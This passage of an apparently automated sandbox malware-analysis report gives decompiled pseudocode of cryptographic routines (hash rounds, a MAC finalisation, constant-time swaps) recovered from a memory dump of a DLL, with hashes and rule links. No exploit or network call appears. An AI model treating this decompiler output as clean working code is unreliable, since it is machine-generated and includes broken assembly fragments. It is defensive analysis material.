				 *((intOrPtr*)(__rcx + 0x10)) =  *((intOrPtr*)(__rcx + 0x10)) + __r8;
				_t109 =  *((intOrPtr*)(__rcx + 0x40));
				if (_t109 == 0) goto 0xf30aa85b;
				r15d = 8;
				_t117 = _t116 - _t109;
				_t58 =  <  ? __r8 : _t117;
				if (_t58 - 3 <= 0) goto 0xf30aa863;
				r14d =  *__rdx;
				r10d = 4;
				goto 0xf30aa869;
				r15d = 0;
				goto 0xf30aa919;
				r10d = 0;
				r14d = 0;
				if ((__r10 | 0x00000001) - _t58 >= 0) goto 0xf30aa88c;
				if ((__r10 | 0x00000002) - _t58 >= 0) goto 0xf30aa8a3;
				r10d = r10d << 3;
				_t115 = (_t111 | _t84 << __r10 * 0x00000008 | _t58 << r10d) << _t109 * 0x00000008 |  *(__rcx + 0x38);
				 *(__rcx + 0x38) = _t115;
				if (_t117 - __r8 <= 0) goto 0xf30aa8c3;
				_t110 = _t109 + __r8;
				goto 0xf30aa9ea;
				_t77 =  *(__rcx + 0x28);
				_t61 =  *(__rcx + 0x18) + _t77;
				asm("dec eax");
				_t87 =  *(__rcx + 0x30) ^ _t115;
				_t78 = _t77 ^ _t61;
				asm("dec eax");
				_t94 =  *(__rcx + 0x20) + _t87;
				asm("dec eax");
				_t88 = _t87 ^ _t94;
				_t62 = _t61 + _t88;
				asm("dec eax");
				_t95 = _t94 + _t78;
				asm("dec eax");
				 *(__rcx + 0x30) = _t88 ^ _t62;
				asm("dec eax");
				 *(__rcx + 0x28) = _t78 ^ _t95;
				 *(__rcx + 0x20) = _t95;
				 *(__rcx + 0x18) = _t62 ^ _t115;
				r11d = r8d;
				r11d = r11d & 0x00000007;
				_t104 = __r8 - _t117 & 0xfffffff8;
				if (_t117 - _t104 >= 0) goto 0xf30aa98f;
				_t90 =  *(__rcx + 0x28);
				_t97 =  *(__rcx + 0x18) + _t90;
				asm("dec eax");
				_t73 =  *((intOrPtr*)(__rdx + _t117));
				_t91 = _t90 ^ _t97;
				asm("dec eax");
				_t65 =  *(__rcx + 0x30) ^ _t73;
				_t81 =  *(__rcx + 0x20) + _t65;
				asm("dec eax");
				_t66 = _t65 ^ _t81;
				_t98 = _t97 + _t66;
				asm("dec eax");
				_t82 = _t81 + _t91;
				asm("dec eax");
				asm("dec eax");
				_t99 = _t98 ^ _t73;
				_t118 = _t117 + 8;
				if (_t118 - _t104 < 0) goto 0xf30aa93c;
				 *(__rcx + 0x30) = _t66 ^ _t98;
				 *(__rcx + 0x18) = _t99;
				 *(__rcx + 0x28) = _t91 ^ _t82;
				 *(__rcx + 0x20) = _t82;
				if (r11d - 3 <= 0) goto 0xf30aa9a1;
				r8d = 4;
				goto 0xf30aa9a6;
				r8d = 0;
				if ((_t104 | 0x00000001) - _t110 >= 0) goto 0xf30aa9cc;
				_t105 = _t104 | 0x00000002;
				if (_t105 - _t110 >= 0) goto 0xf30aa9e6;
				r8d = r8d << 3;
				 *(__rcx + 0x38) = _t99 | _t104 + _t118 << _t104 * 0x00000008 | _t104 + _t118 << _t104 * 0x00000008 << r8d;
				 *((long long*)(__rcx + 0x40)) = _t110;
				return  *(__rdx + _t118 + _t105) & 0x000000ff;
			}

0x7fef30aa82a
0x7fef30aa82e
0x7fef30aa835
0x7fef30aa837
0x7fef30aa83d
0x7fef30aa846
0x7fef30aa84e
0x7fef30aa850
0x7fef30aa853
0x7fef30aa859
0x7fef30aa85b
0x7fef30aa85e
0x7fef30aa863
0x7fef30aa866
0x7fef30aa873
0x7fef30aa88f
0x7fef30aa896
0x7fef30aa8ae
0x7fef30aa8b2
0x7fef30aa8b9
0x7fef30aa8bb
0x7fef30aa8be
0x7fef30aa8c7
0x7fef30aa8cf
0x7fef30aa8d2
0x7fef30aa8d6
0x7fef30aa8d9
0x7fef30aa8dc
0x7fef30aa8e4
0x7fef30aa8e7
0x7fef30aa8eb
0x7fef30aa8ee
0x7fef30aa8f1
0x7fef30aa8f8
0x7fef30aa8fb
0x7fef30aa8ff
0x7fef30aa906
0x7fef30aa90a
0x7fef30aa90e
0x7fef30aa915
0x7fef30aa91c
0x7fef30aa91f
0x7fef30aa923
0x7fef30aa92a
0x7fef30aa938
0x7fef30aa93c
0x7fef30aa93f
0x7fef30aa943
0x7fef30aa947
0x7fef30aa94a
0x7fef30aa94e
0x7fef30aa951
0x7fef30aa954
0x7fef30aa958
0x7fef30aa95b
0x7fef30aa95e
0x7fef30aa962
0x7fef30aa965
0x7fef30aa96c
0x7fef30aa973
0x7fef30aa976
0x7fef30aa97d
0x7fef30aa97f
0x7fef30aa983
0x7fef30aa987
0x7fef30aa98b
0x7fef30aa993
0x7fef30aa999
0x7fef30aa99f
0x7fef30aa9a1
0x7fef30aa9b0
0x7fef30aa9c8
0x7fef30aa9cf
0x7fef30aa9d9
0x7fef30aa9e6
0x7fef30aa9ea
0x7fef30aa9f5

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e9a9215eeb711db85d5d2d582c3799bfd0ac5a7c340444f0498eb6bc09d37f2
Instruction ID: 55af5970b54ef7fa39d390616381811ab9fbc94c34dc9cab7ef5ededccb942f0
Opcode Fuzzy Hash: 4e9a9215eeb711db85d5d2d582c3799bfd0ac5a7c340444f0498eb6bc09d37f2
Instruction Fuzzy Hash: 4341CC73B29BA183FED0CB55E6513797292A304BE0F002632CE5E63BD4DA38D9979345

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30C9F00 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b53713d6c1573d2f1e15960cb9991f1bb283d8543c9fdc6cf4aa4c095606bc73
Instruction ID: e74a822a2af51de1d97eac5bf9c8d08023a5642f51575e723120458832970d19
Opcode Fuzzy Hash: b53713d6c1573d2f1e15960cb9991f1bb283d8543c9fdc6cf4aa4c095606bc73
Instruction Fuzzy Hash: 7841E5EAC29FB945E723A33A6C43286DA009EF7589550E303FCB439E65F701B4D13224

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30E7E10 Relevance: .1, Instructions: 129
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E000007FE7FEF30E7E10(signed long long __rax, signed int __rbx, void* __rcx, signed int* __rdx, void* __r9, signed int __r11, long long _a24) {
				unsigned int _t29;
				signed int _t31;
				unsigned int _t33;
				signed int _t38;
				void* _t41;
				signed int _t44;
				signed int _t45;
				signed int _t47;
				signed int _t53;
				signed int _t63;
				signed int _t66;
				signed int _t68;
				signed int _t70;
				signed long long _t74;
				signed int _t84;
				signed long long _t103;

				_t74 = __rax;
				_a24 = __rbx;
				_t103 = __rcx + 0x0000003f & 0xffffffc0;
				if ( *((intOrPtr*)(_t103 + 0x48)) == 0) goto 0xf30e7e50;
				_t84 = _t103 + 0x38;
				E000007FE7FEF30E84E0(__rbx, _t103, _t84,  *((intOrPtr*)(_t103 + 0x48)), __r11);
				_t45 =  *(_t103 + 0x24);
				_t29 = (_t45 >> 0x1a) +  *(_t103 + 0x28);
				r11d = _t29;
				_t31 = (_t29 >> 0x1a) +  *(_t103 + 0x2c);
				r11d = r11d & 0x03ffffff;
				_t33 = (_t31 >> 0x1a) +  *(_t103 + 0x30);
				_t66 = _t31 & 0x03ffffff;
				_t70 = _t33 & 0x03ffffff;
				r15d = (_t33 >> 0x1a) +  *(_t103 + 0x34);
				r15d = r15d & 0x03ffffff;
				_t47 = _t84 + 5;
				r8d = _t47;
				r8d = r8d >> 0x1a;
				r8d = r8d + r11d;
				r10d = r8d;
				r10d = r10d >> 0x1a;
				r10d = r10d + _t66;
				r14d = r10d;
				r14d = r14d >> 0x1a;
				r14d = r14d + _t70;
				_t63 = (r14d >> 0x1a) + 0xfc000000 + r15d;
				_t44 = (_t63 >> 0x1f) - 1;
				r8d = r8d & _t44;
				r8d = r8d & 0x03ffffff;
				r14d = r14d & _t44;
				_t38 =  !_t44;
				r10d = r10d & _t44;
				r11d = r11d & _t38;
				r8d = r8d | r11d;
				r11d = r8d;
				 *(_t103 + 0x28) = r11d;
				r9d = _t47 & _t44 & 0x03ffffff | _t74 + _t74 * 0x00000004 + (_t45 & 0x03ffffff) & _t38;
				 *(_t103 + 0x24) = r9d;
				r15d = r15d & _t38;
				r10d = r10d & 0x03ffffff;
				_t68 = _t66 & _t38 | r10d;
				 *(_t103 + 0x2c) = _t68;
				r14d = r14d & 0x03ffffff;
				r14d = r14d | _t70 & _t38;
				r15d = r15d | _t63 & _t44;
				 *(_t103 + 0x30) = r14d;
				r8d = _t68;
				 *(_t103 + 0x34) = r15d;
				r9d =  *(_t103 + 0x58);
				r8d = r8d << 0x14;
				 *__rdx = r8d << 0x1a;
				__rdx[1] = r8d;
				_t53 = r14d << 0xe;
				r14d = r14d >> 0x12;
				r15d = r15d << 8;
				__rdx[2] = _t53;
				r14d = r14d | r15d;
				_t41 =  *((intOrPtr*)(_t103 + 0x5c)) + r14d;
				__rdx[3] = _t53 + _t41;
				return _t41;
			}

0x7fef30e7e10
0x7fef30e7e10
0x7fef30e7e2b
0x7fef30e7e36
0x7fef30e7e38
0x7fef30e7e3f
0x7fef30e7e50
0x7fef30e7e5f
0x7fef30e7e63
0x7fef30e7e69
0x7fef30e7e6d
0x7fef30e7e79
0x7fef30e7e7d
0x7fef30e7e8c
0x7fef30e7e92
0x7fef30e7e98
0x7fef30e7ea4
0x7fef30e7ea7
0x7fef30e7eaa
0x7fef30e7eae
0x7fef30e7eb1
0x7fef30e7eb4
0x7fef30e7eb8
0x7fef30e7ebb
0x7fef30e7ebe
0x7fef30e7ec2
0x7fef30e7ed1
0x7fef30e7ed9
0x7fef30e7edb
0x7fef30e7ee0
0x7fef30e7eed
0x7fef30e7ef2
0x7fef30e7ef4
0x7fef30e7ef9
0x7fef30e7efc
0x7fef30e7f04
0x7fef30e7f07
0x7fef30e7f0f
0x7fef30e7f12
0x7fef30e7f16
0x7fef30e7f1c
0x7fef30e7f23
0x7fef30e7f2a
0x7fef30e7f31
0x7fef30e7f3a
0x7fef30e7f3d
0x7fef30e7f40
0x7fef30e7f44
0x7fef30e7f47
0x7fef30e7f5a
0x7fef30e7f5e
0x7fef30e7f65
0x7fef30e7f7f
0x7fef30e7f84
0x7fef30e7f91
0x7fef30e7f98
0x7fef30e7f9c
0x7fef30e7fa1
0x7fef30e7fa8
0x7fef30e7fad
0x7fef30e7fc1

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59b6b17f82db44ab1f456e2475570c170afd5661065dbf679013938558d1c0c8
Instruction ID: ca9bd64fb4774d14773f8853c5221085c3929d0ecc9e827b3fe079a43bcec9cf
Opcode Fuzzy Hash: 59b6b17f82db44ab1f456e2475570c170afd5661065dbf679013938558d1c0c8
Instruction Fuzzy Hash: 02414DF3B302944BD399CF29D844E597B99F7587A47466328EF16673C0D638C951CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30C7F20 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27b92fe9ba5cd923fd923fd2e71e1e8aa5056b218a1f8a822b7fec3f7bdc3726
Instruction ID: 5ae54fc81737abad50396d530e475c5f4155e2b77f137b6dccf093854393019b
Opcode Fuzzy Hash: 27b92fe9ba5cd923fd923fd2e71e1e8aa5056b218a1f8a822b7fec3f7bdc3726
Instruction Fuzzy Hash: CD41DD2AE2CFD725F31383396403A36E2006FF7195E81E71FBDE4B1862EB6553416218

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30EB020 Relevance: .1, Instructions: 124
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E000007FE7FEF30EB020(void* __eax, signed int* __rcx, signed int* __rdx) {

				r9d = r8b & 0xffffffff;
				r8d =  *__rcx;
				r9d =  ~r9d;
				r8d = r8d ^  *__rdx;
				r8d = r8d & r9d;
				 *__rcx =  *__rcx ^ r8d;
				__rcx[1] = __rcx[1] ^ (__rcx[1] ^ __rdx[1]) & r9d;
				__rcx[2] = __rcx[2] ^ (__rcx[2] ^ __rdx[2]) & r9d;
				__rcx[3] = __rcx[3] ^ (__rcx[3] ^ __rdx[3]) & r9d;
				__rcx[4] = __rcx[4] ^ (__rcx[4] ^ __rdx[4]) & r9d;
				__rcx[5] = __rcx[5] ^ (__rcx[5] ^ __rdx[5]) & r9d;
				__rcx[6] = __rcx[6] ^ (__rcx[6] ^ __rdx[6]) & r9d;
				__rcx[7] = __rcx[7] ^ (__rcx[7] ^ __rdx[7]) & r9d;
				__rcx[8] = __rcx[8] ^ (__rcx[8] ^ __rdx[8]) & r9d;
				__rcx[9] = __rcx[9] ^ (__rcx[9] ^ __rdx[9]) & r9d;
				__rcx[0xa] = __rcx[0xa] ^ (__rcx[0xa] ^ __rdx[0xa]) & r9d;
				__rcx[0xb] = __rcx[0xb] ^ (__rcx[0xb] ^ __rdx[0xb]) & r9d;
				__rcx[0xc] = __rcx[0xc] ^ (__rcx[0xc] ^ __rdx[0xc]) & r9d;
				__rcx[0xd] = __rcx[0xd] ^ (__rcx[0xd] ^ __rdx[0xd]) & r9d;
				__rcx[0xe] = __rcx[0xe] ^ (__rcx[0xe] ^ __rdx[0xe]) & r9d;
				__rcx[0xf] = __rcx[0xf] ^ (__rcx[0xf] ^ __rdx[0xf]) & r9d;
				__rcx[0x10] = __rcx[0x10] ^ (__rcx[0x10] ^ __rdx[0x10]) & r9d;
				__rcx[0x11] = __rcx[0x11] ^ (__rcx[0x11] ^ __rdx[0x11]) & r9d;
				__rcx[0x12] = __rcx[0x12] ^ (__rcx[0x12] ^ __rdx[0x12]) & r9d;
				__rcx[0x13] = __rcx[0x13] ^ (__rcx[0x13] ^ __rdx[0x13]) & r9d;
				__rcx[0x14] = __rcx[0x14] ^ (__rcx[0x14] ^ __rdx[0x14]) & r9d;
				__rcx[0x15] = __rcx[0x15] ^ (__rcx[0x15] ^ __rdx[0x15]) & r9d;
				__rcx[0x16] = __rcx[0x16] ^ (__rcx[0x16] ^ __rdx[0x16]) & r9d;
				__rcx[0x17] = __rcx[0x17] ^ (__rcx[0x17] ^ __rdx[0x17]) & r9d;
				__rcx[0x18] = __rcx[0x18] ^ (__rcx[0x18] ^ __rdx[0x18]) & r9d;
				__rcx[0x19] = __rcx[0x19] ^ (__rcx[0x19] ^ __rdx[0x19]) & r9d;
				__rcx[0x1a] = __rcx[0x1a] ^ (__rcx[0x1a] ^ __rdx[0x1a]) & r9d;
				__rcx[0x1b] = __rcx[0x1b] ^ (__rcx[0x1b] ^ __rdx[0x1b]) & r9d;
				__rcx[0x1c] = __rcx[0x1c] ^ (__rcx[0x1c] ^ __rdx[0x1c]) & r9d;
				__rcx[0x1d] = __rcx[0x1d] ^ (__rcx[0x1d] ^ __rdx[0x1d]) & r9d;
				return __eax;
			}

0x7fef30eb023
0x7fef30eb027
0x7fef30eb02a
0x7fef30eb02d
0x7fef30eb030
0x7fef30eb033
0x7fef30eb03f
0x7fef30eb04d
0x7fef30eb05b
0x7fef30eb069
0x7fef30eb077
0x7fef30eb085
0x7fef30eb093
0x7fef30eb0a1
0x7fef30eb0af
0x7fef30eb0bd
0x7fef30eb0cb
0x7fef30eb0d9
0x7fef30eb0e7
0x7fef30eb0f5
0x7fef30eb103
0x7fef30eb111
0x7fef30eb11f
0x7fef30eb12d
0x7fef30eb13b
0x7fef30eb149
0x7fef30eb157
0x7fef30eb165
0x7fef30eb173
0x7fef30eb181
0x7fef30eb18f
0x7fef30eb19d
0x7fef30eb1ab
0x7fef30eb1b9
0x7fef30eb1c7
0x7fef30eb1cb

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b74434e6aa90bdce6413021d468f3d842a0f8ac57f3fed7a6fcf81888fbc3070
Instruction ID: e70e497514102b011e45e5c89234a4610a5fe54e502217bcec57300eb83186a8
Opcode Fuzzy Hash: b74434e6aa90bdce6413021d468f3d842a0f8ac57f3fed7a6fcf81888fbc3070
Instruction Fuzzy Hash: BE5150739146548B834DCB74E5ABE2A77B9F75C708346411ED30B8B690EB36A8A0CF48

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30E6F50 Relevance: .1, Instructions: 104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 28%

			E000007FE7FEF30E6F50(void* __rcx, void* __rdx, signed long long __rsi, long long __rbp, signed long long __r11, long long __r14, long long __r15, long long _a16) {
				signed long long _v24;
				long long _v32;
				long long _v40;
				signed int _v56;
				char _v120;
				void* __rbx;
				void* __rdi;
				void* _t21;
				void* _t25;
				signed long long _t30;
				signed long long _t31;
				void* _t52;
				void* _t84;
				signed long long _t85;
				long long _t87;
				signed long long _t90;
				signed long long _t97;
				signed long long _t102;

				_t102 = __r11;
				_t87 = __rbp;
				_t85 = __rsi;
				_t30 =  *0xf319c428; // 0x2fa980d671f5
				_t31 = _t30 ^ _t90;
				_v56 = _t31;
				asm("inc ecx");
				asm("inc ecx");
				_t52 = __rdx;
				asm("movaps [esp+0x20], xmm0");
				asm("inc ecx");
				asm("movaps [esp+0x30], xmm1");
				asm("inc ecx");
				asm("movaps [esp+0x40], xmm0");
				asm("movaps [esp+0x50], xmm1");
				E000007FE7FEF30E7CD0(_t21, __rdx,  &_v120, __rcx, __rsi, __rbp);
				r11d = 0;
				if (_t52 == 0) goto 0xf30e70df;
				_a16 = _t87;
				_v24 = _t85;
				_v32 = __r14;
				_v40 = __r15;
				_t97 =  *((intOrPtr*)(_t90 + 0x40 + _t102 * 8));
				_t84 = __rcx + 0x10;
				_t80 = _t97 << 0x00000020 | _t31;
				_t99 = _t97 & 0x00000000 |  *(_t90 + 0x20 + _t102 * 8) >> 0x00000020;
				 *(_t84 - 0x10) = ((((_t97 << 0x00000020 | _t31) ^ ((_t80 >> 0x00000010 ^ _t80) & _t85) << 0x00000010 ^ (_t80 >> 0x00000010 ^ _t80) & _t85 ^ ((((_t97 << 0x00000020 | _t31) ^ ((_t80 >> 0x00000010 ^ _t80) & _t85) << 0x00000010 ^ (_t80 >> 0x00000010 ^ _t80) & _t85) >> 0x00000008 ^ _t81) & 0x0000ff00) << 0x00000008 ^ (((_t97 << 0x00000020 | _t31) ^ ((_t80 >> 0x00000010 ^ _t80) & _t85) << 0x00000010 ^ (_t80 >> 0x00000010 ^ _t80) & _t85) >> 0x00000008 ^ _t81) & 0x0000ff00) >> 0x00000004 ^ (_t97 << 0x00000020 | _t31) ^ ((_t80 >> 0x00000010 ^ _t80) & _t85) << 0x00000010 ^ (_t80 >> 0x00000010 ^ _t80) & _t85 ^ ((((_t97 << 0x00000020 | _t31) ^ ((_t80 >> 0x00000010 ^ _t80) & _t85) << 0x00000010 ^ (_t80 >> 0x00000010 ^ _t80) & _t85) >> 0x00000008 ^ _t81) & 0x0000ff00) << 0x00000008 ^ (((_t97 << 0x00000020 | _t31) ^ ((_t80 >> 0x00000010 ^ _t80) & _t85) << 0x00000010 ^ (_t80 >> 0x00000010 ^ _t80) & _t85) >> 0x00000008 ^ _t81) & 0x0000ff00) & 0x00f000f0) << 0x00000004 ^ (((_t97 << 0x00000020 | _t31) ^ ((_t80 >> 0x00000010 ^ _t80) & _t85) << 0x00000010 ^ (_t80 >> 0x00000010 ^ _t80) & _t85 ^ ((((_t97 << 0x00000020 | _t31) ^ ((_t80 >> 0x00000010 ^ _t80) & _t85) << 0x00000010 ^ (_t80 >> 0x00000010 ^ _t80) & _t85) >> 0x00000008 ^ _t81) & 0x0000ff00) << 0x00000008 ^ (((_t97 << 0x00000020 | _t31) ^ ((_t80 >> 0x00000010 ^ _t80) & _t85) << 0x00000010 ^ (_t80 >> 0x00000010 ^ _t80) & _t85) >> 0x00000008 ^ _t81) & 0x0000ff00) >> 0x00000004 ^ (_t97 << 0x00000020 | _t31) ^ ((_t80 >> 0x00000010 ^ _t80) & _t85) << 0x00000010 ^ (_t80 >> 0x00000010 ^ _t80) & _t85 ^ ((((_t97 << 0x00000020 | _t31) ^ ((_t80 >> 0x00000010 ^ _t80) & _t85) << 0x00000010 ^ (_t80 >> 0x00000010 ^ _t80) & _t85) >> 0x00000008 ^ _t81) & 0x0000ff00) << 0x00000008 ^ (((_t97 << 0x00000020 | _t31) ^ ((_t80 >> 0x00000010 ^ _t80) & _t85) << 0x00000010 ^ (_t80 >> 0x00000010 ^ _t80) & _t85) >> 0x00000008 ^ _t81) & 0x0000ff00) & 0x00f000f0 ^ _t82;
				 *(_t84 - 8) = ((((_t97 & 0x00000000 |  *(_t90 + 0x20 + _t102 * 8) >> 0x00000020) ^ ((_t99 >> 0x00000010 ^ _t99) & _t85) << 0x00000010 ^ (_t99 >> 0x00000010 ^ _t99) & _t85 ^ ((((_t97 & 0x00000000 |  *(_t90 + 0x20 + _t102 * 8) >> 0x00000020) ^ ((_t99 >> 0x00000010 ^ _t99) & _t85) << 0x00000010 ^ (_t99 >> 0x00000010 ^ _t99) & _t85) >> 0x00000008 ^ _t100) & 0x0000ff00) << 0x00000008 ^ (((_t97 & 0x00000000 |  *(_t90 + 0x20 + _t102 * 8) >> 0x00000020) ^ ((_t99 >> 0x00000010 ^ _t99) & _t85) << 0x00000010 ^ (_t99 >> 0x00000010 ^ _t99) & _t85) >> 0x00000008 ^ _t100) & 0x0000ff00) >> 0x00000004 ^ (_t97 & 0x00000000 |  *(_t90 + 0x20 + _t102 * 8) >> 0x00000020) ^ ((_t99 >> 0x00000010 ^ _t99) & _t85) << 0x00000010 ^ (_t99 >> 0x00000010 ^ _t99) & _t85 ^ ((((_t97 & 0x00000000 |  *(_t90 + 0x20 + _t102 * 8) >> 0x00000020) ^ ((_t99 >> 0x00000010 ^ _t99) & _t85) << 0x00000010 ^ (_t99 >> 0x00000010 ^ _t99) & _t85) >> 0x00000008 ^ _t100) & 0x0000ff00) << 0x00000008 ^ (((_t97 & 0x00000000 |  *(_t90 + 0x20 + _t102 * 8) >> 0x00000020) ^ ((_t99 >> 0x00000010 ^ _t99) & _t85) << 0x00000010 ^ (_t99 >> 0x00000010 ^ _t99) & _t85) >> 0x00000008 ^ _t100) & 0x0000ff00) & 0x00f000f0) << 0x00000004 ^ (((_t97 & 0x00000000 |  *(_t90 + 0x20 + _t102 * 8) >> 0x00000020) ^ ((_t99 >> 0x00000010 ^ _t99) & _t85) << 0x00000010 ^ (_t99 >> 0x00000010 ^ _t99) & _t85 ^ ((((_t97 & 0x00000000 |  *(_t90 + 0x20 + _t102 * 8) >> 0x00000020) ^ ((_t99 >> 0x00000010 ^ _t99) & _t85) << 0x00000010 ^ (_t99 >> 0x00000010 ^ _t99) & _t85) >> 0x00000008 ^ _t100) & 0x0000ff00) << 0x00000008 ^ (((_t97 & 0x00000000 |  *(_t90 + 0x20 + _t102 * 8) >> 0x00000020) ^ ((_t99 >> 0x00000010 ^ _t99) & _t85) << 0x00000010 ^ (_t99 >> 0x00000010 ^ _t99) & _t85) >> 0x00000008 ^ _t100) & 0x0000ff00) >> 0x00000004 ^ (_t97 & 0x00000000 |  *(_t90 + 0x20 + _t102 * 8) >> 0x00000020) ^ ((_t99 >> 0x00000010 ^ _t99) & _t85) << 0x00000010 ^ (_t99 >> 0x00000010 ^ _t99) & _t85 ^ ((((_t97 & 0x00000000 |  *(_t90 + 0x20 + _t102 * 8) >> 0x00000020) ^ ((_t99 >> 0x00000010 ^ _t99) & _t85) << 0x00000010 ^ (_t99 >> 0x00000010 ^ _t99) & _t85) >> 0x00000008 ^ _t100) & 0x0000ff00) << 0x00000008 ^ (((_t97 & 0x00000000 |  *(_t90 + 0x20 + _t102 * 8) >> 0x00000020) ^ ((_t99 >> 0x00000010 ^ _t99) & _t85) << 0x00000010 ^ (_t99 >> 0x00000010 ^ _t99) & _t85) >> 0x00000008 ^ _t100) & 0x0000ff00) & 0x00f000f0 ^ _t101;
				if (_t102 + 1 - _t52 < 0) goto 0xf30e6ff0;
				return E000007FE7FEF30F1360(r8d, _t25, _v56 ^ _t90);
			}

0x7fef30e6f50
0x7fef30e6f50
0x7fef30e6f50
0x7fef30e6f5a
0x7fef30e6f61
0x7fef30e6f64
0x7fef30e6f69
0x7fef30e6f75
0x7fef30e6f7a
0x7fef30e6f7d
0x7fef30e6f82
0x7fef30e6f87
0x7fef30e6f8c
0x7fef30e6f91
0x7fef30e6f96
0x7fef30e6f9b
0x7fef30e6fa0
0x7fef30e6fa6
0x7fef30e6fac
0x7fef30e6fbe
0x7fef30e6fcb
0x7fef30e6fda
0x7fef30e6ff0
0x7fef30e6ff5
0x7fef30e700e
0x7fef30e7015
0x7fef30e707d
0x7fef30e70b8
0x7fef30e70bf
0x7fef30e70f5

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f403ed66d00bec57c540c6337d52f79187cc774daf1a07377443de2966f92dd7
Instruction ID: 35425e782dd356e7fa5e3af30097f7308b7fdc9897534db08538c28dd7976853
Opcode Fuzzy Hash: f403ed66d00bec57c540c6337d52f79187cc774daf1a07377443de2966f92dd7
Instruction Fuzzy Hash: E331D76271878887FE549B69A9223BA63A1FB84BC4F04A532DF8E13745DF3CE185D700

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30E6A90 Relevance: .1, Instructions: 96
COMMONCrypto

Download Yara Rule

C-Code - Quality: 32%

